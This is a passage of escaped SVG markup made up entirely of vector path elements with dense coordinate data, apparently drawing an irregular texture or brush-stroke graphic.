d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path 